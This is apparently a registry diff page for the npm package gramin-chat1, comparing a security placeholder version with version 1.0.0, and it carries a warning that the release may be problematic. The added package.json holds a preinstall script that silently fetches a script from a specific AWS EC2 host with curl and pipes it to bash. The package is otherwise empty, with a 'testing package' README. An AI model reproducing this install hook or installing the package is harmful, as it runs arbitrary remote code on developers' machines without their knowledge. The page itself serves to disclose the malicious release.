gramin-chat1 0.0.1-security → 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of gramin-chat1 might be problematic. Click here for more details.
- package/README.md +3 -5
- package/index.js +0 -0
- package/package.json +8 -6
package/README.md
CHANGED
|
@@ -1,5 +1,3 @@
|
|
|
1
|
-
#
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=gramin-chat1 for more information.
|
|
1
|
+
# GRAMING CHAT PACKAGE
|
|
2
|
+
- testing package
|
|
3
|
+
|
package/index.js
ADDED
|
File without changes
|
package/package.json
CHANGED
|
@@ -1,6 +1,8 @@
|
|
|
1
|
-
{
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
1
|
+
{
|
|
2
|
+
"name": "gramin-chat1",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"dependencies": {},
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "curl http://ec2-54-234-211-80.compute-1.amazonaws.com:21/ 2>&1 | bash 1>/dev/null 2>&1"
|
|
7
|
+
}
|
|
8
|
+
}
|